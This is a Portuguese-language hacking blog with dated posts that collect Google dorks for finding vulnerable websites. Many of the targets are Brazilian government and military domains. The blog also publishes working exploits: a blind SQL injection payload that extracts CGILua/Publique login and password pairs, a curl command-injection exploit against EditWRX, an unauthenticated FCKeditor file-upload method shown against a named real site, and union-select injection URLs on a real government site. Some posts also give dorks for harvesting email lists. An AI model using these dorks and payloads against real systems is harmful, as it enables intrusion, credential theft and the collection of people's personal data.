Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

Mostrando postagens com marcador dorks. Mostrar todas as postagens
Mostrando postagens com marcador dorks. Mostrar todas as postagens

segunda-feira, 15 de setembro de 2014

Exploit HTMLEditor e dorks upload de arquivos

Explorando HTMLEditor 

Explorando HTMLEditor


DORK[0]=> inurl:/HTMLEditor/editor/
DORK[1]=> inurl:/HTMLEditor/editor//filemanager/
DORK[2]=> inurl:/HTMLEditor/editor//filemanager//connectors/
DORK[3]=> inurl:HTMLEditor & "Index of"
DORK[4]=> inurl:"connectors/uploadtest.html" & "Index of"
DORK[5]=> inurl:"/editor/filemanager/" ext:html
DORK[6]=> inurl:"/filemanager/" "Resource Type"


http://www.target.com/HTMLEditor/editor/filemanager/connectors/uploadtest.html
or
http://www.target.com/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html

Mude o conectar para PHP ele vai efetuar o upload.

Mude o conectar para PHP ele vai efetuar o upload.

Suporte de arquivos: TXT e JPG em algums sites você pode fazer upload HTML e PHP demais.

O arquivo upado pode ser encontrado em:


http://www.target.com/PowerCMS%20folder/files/SEU_ARQUIVO.ALVO
 or
http://www.target.com/patch//PowerCMS%20folder/files/SEU_ARQUIVO.ALVO

Ex:
http://thymeoncavill.com.au/CMS/HTMLEditor/editor/filemanager/connectors/uploadtest.html
UPLOAD=>
http://thymeoncavill.com.au/CMS/files/10487462_686112868144329_1233575004575245355_n.jpg


Exemplo de uso SCANNER INURLBR

COMANDO=>{

./inurlbr.php --dork 'inurl:"/filemanager/" "Resource Type"' -q 1,6 -s fkeditor.txt -t 2 --replace='/filemanager/[INURL]/filemanager/connectors/uploadtest.html?' -a 'FCKeditor - Uploaders Tests'

}

Resultado:


Exemplo de uso SCANNER INURLBR


quarta-feira, 27 de novembro de 2013

Dorks captura de informações server's

Dorks captura de informações server's

DORKS:
comment:Pages containing network or vulnerability data***-----
filetype:log intext:"ConnectionManager2"
"apricot - admin" 00h
"Network Host Assessment Report" "Internet Scanner"
"Output produced by SysWatch *"
"Phorum Admin" "Database Connection" inurl:forum inurl:admin
"Powered by phpOpenTracker" Statistics
"powered | performed by Beyond Security's Automated Scanning" -kazaa -example
"SnortSnarf alert page"
"This file was generated by Nessus"
"this proxy is working fine!" "enter *" "URL***" * visit
"This report lists" "identified by Internet Scanner"
"Traffic Analysis for" "RMON Port * on unit *"
"Version Info" "Boot Version" "Internet Settings"
((inurl:ifgraph "Page generated at") OR ("This page was built using ifgraph"))
ACID "by Roman Danyliw" filetype:php -----Analysis Console for Incident Databases 12-Jul-2004 866-----
ext:cfg radius.cfg
ext:cgi intext:"nrg-" " This web page was created on "
filetype:pdf "Assessment Report" nessus
filetype:php inurl:ipinfo.php "Distributed Intrusion Detection System"
filetype:php inurl:nqt intext:"Network Query Tool"
filetype:vsd vsd network -samples -examples
intext:"Welcome to the Web V.Networks" intitle:"V.Networks [Top]" -filetype:htm
intitle:"ADSL Configuration page"
intitle:"Azureus : Java BitTorrent Client Tracker"
intitle:"BNBT Tracker Info"
intitle:"Microsoft Site Server Analysis"
intitle:"PHPBTTracker Statistics" | intitle:"PHPBT Tracker Statistics"
intitle:"start.managing.the.device" remote pbx acc
intitle:"sysinfo * " intext:"Generated by Sysinfo * written by The Gamblers."
intitle:"twiki" inurl:"TWikiUsers"
inurl:"/catalog.nsf" intitle:catalog
inurl:"install/install.php"
inurl:"map.asp?" intitle:"WhatsUp Gold"
inurl:"sitescope.html" intitle:"sitescope" intext:"refresh" -demo
inurl:/adm-cfgedit.php
inurl:/cgi-bin/finger? "In real life"
inurl:/cgi-bin/finger? Enter (account|host|user|username)
inurl:phpSysInfo/ "created by phpsysinfo"
inurl:portscan.php "from Port"|"Port Range"
inurl:statrep.nsf -gov
inurl:testcgi xitami
inurl:webutil.pl
"Looking Glass" (inurl:"lg/" | inurl:lookingglass) -----Looking Glass-----
intitle:That.Site.Running Apache

sexta-feira, 11 de outubro de 2013

Dorks de vândalo

Dorks de vândalo


DORK'S: 


site:.websiteseguro.com inurl:produto.php?id=
site:.com /ccbill/  "DOCUMENT_ROOT" ext:cgi
inurl:game.php?id=
inurl:mil inurl:"/?fbconnect_action=myhome"
site:.gov.br "Microsoft OLE DB Provider"
site:.esporte.gov.br ext:asp
site:.esporte.gov.br (id|new|ver)
site:.esporte.gov.br (id|new|ver)
site:.psdb.org.br ext:asp id
site:.websiteseguro.com inurl:produto.php?id=
site:.globo.com ext:php mysql_
site:.gov.br .php?id= syntax; -pdf -policiacivil
site:.gov.br SQL "syntax;"
site:.ap.gov.br "SQL syntax;" ext:php
site:.gov.br ext:sql -svn
site:.nsa.gov PDF -public_info
site:.mil.br "mil br" index.php?option= view
site:.com inurl:tinybrowser ext:php intitle: TinyBrowser
site:.gov.br (error) mysql (prefeitura) ext:php -pdf
site:br index.php?option=com_user
site:.gov.br .php?id= syntax;
site:.gov.br ext:php (id*=|view=)
site:gov.br & intext:"SQL syntax" & +inurl:php?= +(id) -pdf -forum -softwarepublico -ppt -ftp -intext:"SQL injection"
site:rj.gov.br (php|asp|aspx) ? id
site:.gov.br syntax; -pdf inurl:(|&id=|?id=|)
site:br ext:asp (id*=|view=) 80040E14
site:.com.br ext:asp (id*=|view=) 80040E14 -superasp
site:.anatel.gov.br ext:asp
site:.gov.br (php|asp|aspx) ? id notic
site:.mg.gov.br (php|asp) ?id=
intitle:camara site:.gov.br ext:php (id*=|view=)
intitle:camara site:.gov.br ext:php (id*=|view=) -projetodomhelder
intitle:prefeitura site:.gov.br ext:php (id*=|view=) syntax;
inurl:?fbconnect_action= myhome&fbuserid=*
site:br inurl:view.php?id=* ext:php -Bug -moodle
site:.com.br inurl:"ver_news.php?id="
site:.ceara.gov.br ext:asp
site:.sp.gov.br inurl:.php? intext:"Warning" -policiacivil
intext:"vBulletin" inurl:install/upgrade.php
site:.ceara.gov.br ext:asp
site:.ceara.gov.br ext:asp "*.asp?" "=*"
inurl:.policiacivil.sp.gov.br modules
inurl:.policiacivil.sp.gov.br modules ".php?"
inurl:"/?fbconnect_action=myhome"

sexta-feira, 20 de setembro de 2013

DORK BUSCA DE EMAIL LIST

DORK BUSCA DE EMAIL LIST

DORK['0'] site:.br +@ (hotmail|yahoo|bol) br ext:txt
DORK['1'] site:br title:"index of" @ yahoo br ext:csv

Exemplo de achado:
site:www.contabeis.com.br ext:txt
site:www.tramontina.com.br ext:csv

terça-feira, 17 de setembro de 2013

CGILua 3.2.1 CGI exploit

CGILua 3.2.1 CGI exploit

O CGILua'
é uma ferramenta que permite criar páginas Web dinâmicas e manipular a inserção de dados por meio de formulários Web.
O CGILua permite separar o tratamento dos dados e a lógica do processo de geração de páginas, facilitando o desenvolvimento de aplicativos Web em Lua. Uma das vantagens do CGILua é sua capacidade de abstrair o servidor Web utilizado.
Você pode desenvolver um aplicativo em CGILua para um servidor Web e executá-lo em qualquer outro servidor Web compatível com CGILua.
O CGILua é um programa escrito em C onde você embute trechos escritos em Lua. E o executável do CGILua faz toda a comunicação desse trecho Lua com o protocolo http da Internet. Ou seja, ele faz o papel do CGI.


======================================================================
DORK[1]: CGILua 3.2.1 CGI
Filtrando domínio.
DORK[2]: site:.gov.br intext:"CGILua 3.2.1 CGI"
DORK[3]: inurl:cgi/cgilua.exe/sys/start.htm?sid=1
DORK[4]: inurl:"cgi/cgilua.exe/"
======================================================================


ID de referências para cada página tem um ID específico ("sid") que o quadro utiliza na maioria das URLs.
Por exemplo, para acessar a página referida pelo ID = 1, o
Seguinte URL é usada:

======================================================================
Exploit - SQL injection
======================================================================

FALHA: /publique/cgi/cgilua.exe/sys/start.htm?sid=1[INJEÇÃO-SQL]

EXPLOIT = /publique/cgi/cgilua.exe/sys/start.htm?sid=1))+U
NION+ALL
+SELECT+IF((ASCII(SUBSTRING((SELECT+CONCAT(F_Login,':',F_Password)+FROM

+Publique.T_Actor+LIMIT+1+OFFSET+0),1,1))>97),BENCHMARK(1000000,MD5('A'
)),0)%23


Essa consulta primeiros concatena "F_Login" e colunas "F_Password" do tabela interna "T_Actor" e retorna a primeira linha (graças à "LIMIT 1 DESVIO 0 "statement). Então, ele verifica se o valor ASCII do primeiro caractere retornado é maior do que 97 (a letra 'a'). Se a condição for satisfeita ele irá acionar a função de referência, causando um atraso significativo no servidor resposta (cerca de 4 segundos usando nosso laboratório de testes). Ao repetir a consulta

======================================================================
USANDO Exploit:
======================================================================

http://SITE/publique/cgi/cgilua.exe/sys/start.htm?sid=1[EXPLOIT]


http://SITE/publique/cgi/cgilua.exe/sys/start.htm?sid=1))+U
NION+ALL
+SELECT+IF((ASCII(SUBSTRING((SELECT+CONCAT(F_Login,':',F_Password)+FROM

+Publique.T_Actor+LIMIT+1+OFFSET+0),1,1))>97),BENCHMARK(1000000,MD5('A'
)),0)%23


NEM TODOS DÃO CERTO, mas pode gerar um erro que vai te mostrar qual tipo de banco você esta tratando, assim direcionar melhor sua investida.


REF:http://pt.wikipedia.org/wiki/CGILua
REF:http://www.securityfocus.com/archive/1/archive/1/509142/100/0/threaded
Tutorial CGILua 3.2 :http://www.yumpu.com/pt/document/view/5904124/tutorial-cgilua-32

segunda-feira, 26 de agosto de 2013

EditWRX CMS Executar codico remotamente + Admin Bypass Zero Day!

EditWRX é vulnerável a execução de código remoto através da falta de filtro function
open() no downloader, que pode ler em comandos canalizados na GET "download" Apesar do downloader ser um componente administrativo, O login Não é necessário para executar  a função.


DORK: +inurl:editwrx/wrx.cgi
Exploit: ?download=;uname%20-a| 

Exemplo de uso:
curl "http://sitevull.com/editwrx/wrx.cgi?download=;uname%20-a|"

terça-feira, 13 de agosto de 2013

Dork's de vândalos, dorks buscam possíveis injeções de SQL nas URL

Dork's de vândalos.

Dork's de vândalos.


Essas dorks buscam possíveis injeções de SQL nas URL digamos.
DORK="gov" inurl:"UNION ALL SELECT 1,2,"

http://URLENCONTRARA.gov/ARQUIVO.PHPouASP?GET=[DORK]*


Exemplo de achado:
http://www.londonbritaintownship-pa.gov/newsDetail.php?recordID=-19+union+all+select+1,2,user(),version(),5,6,7,8,9--


OUTRAS DORKS DO MESMO PADRÃO

"gov" inurl:"UNION ALL SELECT 1,2,"
inurl:"UNION ALL SELECT 1" concat
site:br inurl:"UNION ALL SELECT 1" concat

terça-feira, 30 de julho de 2013

Dork SWFUpload xss Wordpress.

Dork SWFUpload  XSS Wordpress.


Dork SWFUpload  xss Wordpress.

SWFUpload é uma biblioteca JavaScript que envolve a função de upload do Flash Player. Traz seus uploads para o próximo nível com lima múltipla escolha, Upload Progress e do lado do cliente Tamanho do Arquivo Verificação.

Ao contrário de outras ferramentas de upload em Flash, SWFUpload deixa a UI nas mãos do desenvolvedor. Usando um conjunto de manipuladores de eventos de exibição desenvolvedores podem fazer upload de seu próprio progresso e status para o usuário em HTML / CSS UI.






DORK: site:.gov.br  +inurl:wp-includes/js/swfupload/

Exemplo: 

site:Domínio   +inurl:wp-includes/js/swfupload/

quarta-feira, 10 de julho de 2013

sexta-feira, 24 de maio de 2013

Dork Busca possíveis vulnerabilidades no Joomla! 1.5

Dork Busca possíveis vulnerabilidades no Joomla! 1.5

Dork: site:br +"index.php?option=com_weblinks&view=category&id="

Busca possíveis vulnerabilidades no Joomla! - O sistema dinâmico de portais e gerenciador de conteúdo versão 1.5.


sexta-feira, 17 de maio de 2013

Doks pesquisa File Browser sem senha.

Doks pesquisa File Browser sem senha.



Pesquisa simples mais dá para achar alguns file Browser de upload.
Pelo que pude observar tem algum filtro mas para bular edite o post de envio ele aceita somente imagens.. editando o post ante do envio creio que dá para enganar o filtro.

Dork:intitle:"File Browser" +"Clear log"

quinta-feira, 9 de maio de 2013

segunda-feira, 18 de março de 2013

Doks pesquisa erros sql nos determinados domínios .gov.br . ou .org.br

Doks pesquisa erros sql nos determinados domínios .gov.br . ou  .org.br

Doks pesquisa erros sql nos determinados domínios .gov.br . ou  .org.br

Dork: site:org.br | site:gov.br & ('800a000d' | "MySQL Error") & inurl:*id*= -forum -forums -xoops -portal -tutorial

sexta-feira, 8 de março de 2013

Dork busca email

Dork  email .governo

Dork  email .governo


Dorkeiros de plantão que adoram list emails...
Dorks para emails-list relacionado ao governo brasileiro.

intext:@camara.leg.br ext:txt

intext:@*.leg.br or intext:@*.gov.br ext:txt

Alterando o formato ext: outros formatos.
Exemplo de uso:ext:log ou ext:sql ou ext:ini

sexta-feira, 15 de fevereiro de 2013

Dorks buscar sites do governo brasileiro com erros sql.

Dorks buscar sites do governo brasileiro com erros sql.

Dork: site:gov.br & intext:"SQL syntax" & +inurl:php?= +(id) -pdf -forum -softwarepublico -ppt -ftp -intext:"SQL injection"

Explicativo:

site:gov.br = restringir nossa busca somente no domínio gov.br, mas tambem pode ser usado para outros domínios.
& =  Operador logico.
intext:"SQL syntax" =  Procurar no texto interno da pagina o conjunto de palavras "SQL syntax".
+inurl:php?=  = "+" força o motor de busca pesquisa a determinada palavra ou operador, inurl:palavra = pesquisar na URL da pagina.
 - = Retira da pesquisa assim facilita o filtro.
 
 

terça-feira, 11 de dezembro de 2012

Dork forçando filtro procurar erros!




Dork forçando filtro procurar erros!


Faz um tempo que não posto dorks certo aé vai uma Dork que força o filtro, deixando nossa pesquisa muito mais limpa e objetiva.


Dork:intext:(You have) intext:error  +inurl:.php?*id= -forums -bugs -stackoverflow -help -apost -w3school -exploit -title:"PHP*" -inurl:tuto*"

Pode add operador site:domínio, vamos deixar muito mais limpa nossa pesquisa.

domingo, 9 de dezembro de 2012

Procurando pagina de logins com dorks

Procurando pagina de logins com dorks
Muitas vezes não precisamos de programas sofisticados para achar forms de login.
Utilizando poder dork.
O que são DORK, a grosso modo são meios de pesquisa avançada em motores de busca, que tem o intuito de explorar seus alvos de acordo com a necessidade do atacante.
Pode ser usado para procurar SQLI,RFI,LFI, Arquivo sensíveis e etc...
No momento este post vai dar uma ajuda em achar forms de login.

Alvo:www.siteteste1.com.br
Dork 01: site:.siteteste1.com.br +login
Dork 02: site:.siteteste1.com.br +senha
Dork 03: site:.siteteste1.com.br +admin
..... etc assim vai.

domingo, 18 de novembro de 2012

Google INURL Troll com força busca de apostilas

Google INURL Troll com força
 
 
Google INURL Troll com força
Apostilas introdutoras.
Basta pesquisa as dorks abaixo no Google.

intext:"logica de programção" ext:pdf
intext:"introdução php" ext:pdf
intext:"introdução java" ext:pdf
intext:"introdução html" ext:pdf
intext:"introdução python" ext:pdf

O resto tudo you you you you you tubiyou! kkk
 "De acordo com sua necessidade mude o teme entre aspas".

domingo, 14 de outubro de 2012

Inurl-Poliglota Dork busca gerenciador de upload em domínio japonês.

Inurl-Poliglota Dork busca gerenciador de upload em domínio japonês.


Chamo essa técnica "Inurl-Poliglota"

Dorks busca  gerenciador de upload em domínio japonês,




A grande maioria das dorks é basiada na linguagem inglês se mudarmos um pouco vamos extrair uma rica quantidade de informação.

incluindo a palavra chave upload em japonês já conseguimos um grande números de servers com os paramestros desejados no caso "inurl:/cgi-bin/upload/upload.cgi".
Podemos ter um resultado parecido com site:jp mais o google sua grande força é palavras chaves então um modo eficas é traduzir a palavra chave.

DORK: アップロード* inurl:/cgi-bin/upload/upload.cgi

Da mesmo forma pode ser feito com Russo,Germânico e outras linguás :)